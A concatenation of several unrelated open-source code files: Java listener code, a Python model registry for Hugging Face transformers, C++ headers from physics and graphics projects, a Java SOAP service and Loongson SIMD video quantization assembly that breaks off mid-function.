l) { 
pcs.addPropertyChangeListener(l); } public void removePropertyChangeListener(PropertyChangeListener l) { pcs.removePropertyChangeListener(l); } // implementation of PropertyChangeListener public void propertyChange(PropertyChangeEvent evt) { pcs.firePropertyChange(evt); } } }
3,104
1,893
""" Registry module """ from transformers import AutoModel, AutoModelForQuestionAnswering, AutoModelForSequenceClassification from transformers.models.auto.tokenization_auto import TOKENIZER_MAPPING class Registry: """ Methods to register models and fully support pipelines. """ @staticmethod def register(model, config=None): """ Registers a model with auto model and tokenizer configuration to fully support pipelines. Args: model: model to register config: config class name """ # Default config class name to model name if not provided name = model.__class__.__name__ if not config: config = name # Default model config_class if empty if hasattr(model.__class__, "config_class") and not model.__class__.config_class: model.__class__.config_class = config # Add references for this class to supported AutoModel classes for mapping in [AutoModel, AutoModelForQuestionAnswering, AutoModelForSequenceClassification]: mapping.register(config, model.__class__) # Add references for this class to support pipeline AutoTokenizers if hasattr(model, "config") and type(model.config) not in TOKENIZER_MAPPING: TOKENIZER_MAPPING.register(type(model.config), type(model.config).__name__)
496
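The Registry helper above wires a custom model class into the Hugging Face auto-model and tokenizer mappings so pipelines can resolve it. A rough sketch of how it might be used, assuming a recent transformers release (with AutoModel.register) and PyTorch installed; TinyConfig and TinyModel are made-up names for illustration, not part of any library.

# Hypothetical custom model registered through the Registry class above.
import torch
from transformers import PretrainedConfig, PreTrainedModel, AutoModel


class TinyConfig(PretrainedConfig):
    model_type = "tiny-demo"            # made-up model type


class TinyModel(PreTrainedModel):
    config_class = TinyConfig

    def __init__(self, config):
        super().__init__(config)
        self.linear = torch.nn.Linear(4, 4)

    def forward(self, inputs):
        return self.linear(inputs)


model = TinyModel(TinyConfig())
Registry.register(model, TinyConfig)    # adds TinyModel to the auto mappings

# AutoModel can now resolve the custom config class back to TinyModel.
print(AutoModel.from_config(TinyConfig()).__class__.__name__)   # TinyModel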
852
<reponame>Purva-Chaudhari/cmssw #ifndef EventFilter_GEMRawToDigi_GEMRawToDigi_h #define EventFilter_GEMRawToDigi_GEMRawToDigi_h /** \class GEMRawToDigi * \author <NAME>, <NAME> - UoS */ #include <memory> #include "DataFormats/GEMDigi/interface/GEMAMC13.h" class GEMRawToDigi { public: std::unique_ptr<GEMAMC13> convertWordToGEMAMC13(const uint64_t* word); bool vfatError() const { return vfatError_; } bool amcError() const { return amcError_; } private: bool vfatError_; bool amcError_; }; #endif
216
346
/*! -*-c++-*- @file SensorImpl.h @author <NAME> @brief Private implementation of a simple sensor/camera abstraction. \copyright Copyright 2017 Elucideye, Inc. All rights reserved. \license{This project is released under the 3 Clause BSD License.} */ #ifndef __drishti_drishti_SensorImpl_h__ #define __drishti_drishti_SensorImpl_h__ #include <drishti/Sensor.hpp> #include <drishti/sensor/Sensor.h> _DRISHTI_SDK_BEGIN struct SensorModel::Impl { Impl(const sensor::SensorModel::Intrinsic& intrinsic, const sensor::SensorModel::Extrinsic& extrinsic) { sensor = std::make_shared<sensor::SensorModel>(intrinsic, extrinsic); } // Use shared_ptr<> to support sharing w/ public SDK classes std::shared_ptr<drishti::sensor::SensorModel> sensor; }; _DRISHTI_SDK_END #endif // __drishti_drishti_SensorImpl_h__
319
515
<gh_stars>100-1000 package br.com.caelum.stella.faces.validation; import javax.faces.validator.Validator; import javax.faces.webapp.ValidatorELTag; import javax.servlet.jsp.JspException; /** * Associates a TLD (Tag Library Descriptor) with a Titulo Eleitoral (voter registration) validator * (StellaTituloEleitoralValidator). * * @author <NAME> */ @SuppressWarnings("serial") public class StellaTituloEleitoralValidatorTag extends ValidatorELTag { public StellaTituloEleitoralValidatorTag() { super.setId(StellaTituloEleitoralValidator.VALIDATOR_ID); } /** * @return StellaTituloEleitoralValidator */ @Override protected Validator createValidator() throws JspException { StellaTituloEleitoralValidator validator = new StellaTituloEleitoralValidator(); return validator; } }
315
363
<reponame>LarsP8/service-proxy /* Copyright 2013 predic8 GmbH, www.predic8.com Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.predic8.contactservice.v20; import javax.jws.WebService; import javax.jws.WebMethod; import javax.jws.WebParam; @WebService(serviceName = "ContactService20", targetNamespace="http://predic8.com/contactService/v20") public class ContactService20 { @WebMethod(operationName = "addContact") public String addContact( @WebParam(name = "firstname") String firstname, @WebParam(name = "lastname") String lastname, @WebParam(name = "email") String email) { return "Hello " + firstname + " " + lastname + " " + email + " from ContactService version 2.0 !"; } }
415
434
#pragma once #include "Base/Base.h" #include "Data/ProjectData.h" #include "Modules/ModuleManager.h" #include "Sea/SeaManager.h" #include "Lighting/LightManager.h" #include "Data/Serializer.h" #include "Menu/MainMenu.h" #include "Generators/MeshGeneratorManager.h" #include "TextureStore/TextureStore.h" #include "Misc/SupportersTribute.h" #include "Filters/FiltersManager.h" #include "Foliage/FoliagePlacement.h" #include "Sky/SkySettings.h" #include "Misc/OSLiscences.h" #include "Shading/ShadingManager.h" #include "Exporters/TextureBaker.h" #include "json/json.hpp" struct ApplicationStateModels { Model *coreTerrain; Model *grid; // For future use Model *screenQuad; Model *customBase; Model *customBaseCopy; ApplicationStateModels(); ~ApplicationStateModels(); }; struct ApplicationStateFrameBuffers { FrameBuffer *reflection = nullptr; FrameBuffer *postProcess = nullptr; FrameBuffer *main = nullptr; }; struct ApplicationStateShaders { Shader *terrain = nullptr; Shader *wireframe = nullptr; Shader *foliage = nullptr; Shader *postProcess = nullptr; // For future use Shader *meshNormals = nullptr; }; struct ApplicationStateCameras { Camera main; Camera postPorcess; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateStatistics { double deltatime = 1; double frameRate = 1; double meshGenerationTime = 0; int triangles = 0; int vertexCount = 0; }; struct ApplicationStateWindows { bool styleEditor = false; bool statsWindow = false; bool shaderEditorWindow = false; bool texturEditorWindow = false; bool seaEditor = false; bool textureStore = false; bool osLisc = false; bool filtersManager = false; bool foliageManager = false; bool supportersTribute = false; bool skySettings = false; bool modulesManager = false; bool lightControls = true; bool cameraControls = true; bool shadingManager = false; bool textureBaker = false; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateModules { ModuleManager *manager; }; struct ApplicationStateStates { bool usingBase = true; bool skyboxEnabled = false; bool vSync = true; bool autoUpdate = false; bool mouseButton1, mouseButton2, mouseButton3; bool wireFrameMode = false; bool reqTexRfrsh = false; bool autoSave = false; bool exploreMode = false; bool iExploreMode = false; bool showFoliage = true; bool textureBake = false; bool useGPUForNormals = false; bool postProcess = false; bool autoAspectCalcRatio = true; std::atomic<bool> ruinning = true; std::atomic<bool> remeshing = false; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateTextures { Texture2D *grid; }; struct ApplicationStateGlobals { float mouseSpeed = 25; float scrollSpeed = 0.5f; float mouseScrollAmount = 0; float viewportMousePosX = 0; float viewportMousePosY = 0; float scale = 1.0f; float offset[3]; int resolution = 256; int numberOfNoiseTypes = 3; int secondCounter = 0; int textureBakeMode = 0; int texBakeRes = 1024; nlohmann::json appData; std::string currentOpenFilePath = ""; std::string currentBaseModelPath = ""; std::string kernelsIncludeDir = ""; float viewportSize[4]; float hMapC[4]; nlohmann::json Save(); void Load(nlohmann::json data); }; struct ApplicationStateConstants { glm::vec3 UP = glm::vec3(0.0f, 1.0f, 0.0f); glm::vec3 DOWN = glm::vec3(0.0f, -1.0f, 0.0f); glm::vec3 FRONT = glm::vec3(0.0f, 0.0f, -1.0f); glm::vec3 BACK = glm::vec3(0.0f, 1.0f, 1.0f); std::string executableDir = ""; std::string dataDir = ""; std::string cacheDir = ""; std::string texturesDir = ""; std::string projectsDir = ""; std::string 
tempDir = ""; std::string shadersDir = ""; std::string kernelsDir = ""; std::string fontsDir = ""; std::string liscensesDir = ""; std::string skyboxDir = ""; std::string modulesDir = ""; std::string modelsDir = ""; std::string configsDir = ""; std::string logsDir = ""; }; enum ApplicationMode { TERRAIN = 0, CUSTOM_BASE, CUBE_MARCHED }; struct ApplicationState { Application *mainApp; ApplicationStateModels models; ApplicationStateFrameBuffers frameBuffers; ApplicationStateShaders shaders; ApplicationStateCameras cameras; ApplicationStateStatistics stats; ApplicationStateWindows windows; ApplicationStateModules modules; ApplicationStateStates states; ApplicationStateTextures textures; ApplicationStateGlobals globals; ApplicationStateConstants constants; SeaManager *seaManager = nullptr; LightManager *lightManager = nullptr; Serializer *serailizer = nullptr; MeshGeneratorManager *meshGenerator = nullptr; MainMenu *mainMenu = nullptr; TextureStore *textureStore = nullptr; SupportersTribute *supportersTribute = nullptr; FiltersManager *filtersManager = nullptr; SkyManager *skyManager = nullptr; OSLiscences *osLiscences = nullptr; ProjectManager *projectManager = nullptr; FoliageManager *foliageManager = nullptr; ShadingManager *shadingManager = nullptr; TextureBaker* textureBaker = nullptr; ApplicationMode mode = ApplicationMode::TERRAIN; ApplicationState(); ~ApplicationState(); };
1,762
3,565
<gh_stars>1000+ /*! * \copy * Copyright (c) 2009-2018, Cisco Systems * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * * * \file quant_mmi.c * * \brief Loongson optimization * * \date 20/07/2018 Created * ************************************************************************************* */ #include <stdint.h> #include "asmdefs_mmi.h" void WelsQuant4x4_mmi(int16_t *pDct, const int16_t* ff, const int16_t *mf) { __asm__ volatile ( ".set arch=loongson3a \n\t" "xor $f10, $f10, $f10 \n\t" "gslqc1 $f10, $f8, 0x0(%[ff]) \n\t" "gslqc1 $f14, $f12, 0x0(%[mf]) \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short *)ff), [mf]"r"((short *)mf) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12", "$f14" ); } void WelsQuant4x4Dc_mmi(int16_t *pDct, const int16_t ff, int16_t mf) { __asm__ volatile ( ".set arch=loongson3a \n\t" "xor $f10, $f10, $f10 \n\t" "dmtc1 %[mf], $f12 \n\t" "pshufh $f12, $f12, $f10 \n\t" "dmtc1 %[ff], $f8 \n\t" "pshufh $f8, $f8, $f10 \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f8 \n\t" 
"pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f12 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f8 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f12 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short)ff), [mf]"r"((short)mf) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12" ); } void WelsQuantFour4x4_mmi(int16_t *pDct, const int16_t* ff, const int16_t *mf) { __asm__ volatile ( ".set arch=loongson3a \n\t" "gslqc1 $f10, $f8, 0x0(%[ff]) \n\t" "gslqc1 $f14, $f12, 0x0(%[mf]) \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, 
$f6 \n\t" "gssqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x70(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x70(%[pDct]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short *)ff), [mf]"r"((short *)mf) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12", "$f14" ); } void WelsQuantFour4x4Max_mmi(int16_t *pDct, const int16_t*ff, const int16_t *mf, int16_t *max) { BACKUP_REG; __asm__ volatile ( ".set arch=loongson3a \n\t" "gslqc1 $f10, $f8, 0x0(%[ff]) \n\t" "gslqc1 $f14, $f12, 0x0(%[mf]) \n\t" "xor $f16, $f16, $f16 \n\t" "xor $f18, $f18, $f18 \n\t" "xor $f20, $f20, $f20 \n\t" "xor $f22, $f22, $f22 \n\t" "xor $f24, $f24, $f24 \n\t" "xor $f26, $f26, $f26 \n\t" "xor $f28, $f28, $f28 \n\t" "xor $f30, $f30, $f30 \n\t" "gslqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f16, $f16, $f0 \n\t" "pmaxsh $f18, $f18, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x0(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f16, $f16, $f0 \n\t" "pmaxsh $f18, $f18, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x10(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh 
$f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f20, $f20, $f0 \n\t" "pmaxsh $f22, $f22, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x20(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f20, $f20, $f0 \n\t" "pmaxsh $f22, $f22, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x30(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f24, $f24, $f0 \n\t" "pmaxsh $f26, $f26, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x40(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f24, $f24, $f0 \n\t" "pmaxsh $f26, $f26, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x50(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f28, $f28, $f0 \n\t" "pmaxsh $f30, $f30, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x60(%[pDct]) \n\t" "gslqc1 $f2, $f0, 0x70(%[pDct]) \n\t" "xor $f4, $f4, $f4 \n\t" "xor $f6, $f6, $f6 \n\t" "pcmpgth $f4, $f4, $f0 \n\t" "pcmpgth $f6, $f6, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "paddush $f0, $f0, $f8 \n\t" "paddush $f2, $f2, $f10 \n\t" "pmulhuh $f0, $f0, $f12 \n\t" "pmulhuh $f2, $f2, $f14 \n\t" "pmaxsh $f28, $f28, $f0 \n\t" "pmaxsh $f30, $f30, $f2 \n\t" "xor $f0, $f0, $f4 \n\t" "xor $f2, $f2, $f6 \n\t" "psubh $f0, $f0, $f4 \n\t" "psubh $f2, $f2, $f6 \n\t" "gssqc1 $f2, $f0, 0x70(%[pDct]) \n\t" "mov.d $f0, $f18 \n\t" "punpckhhw $f18, $f16, $f20 \n\t" 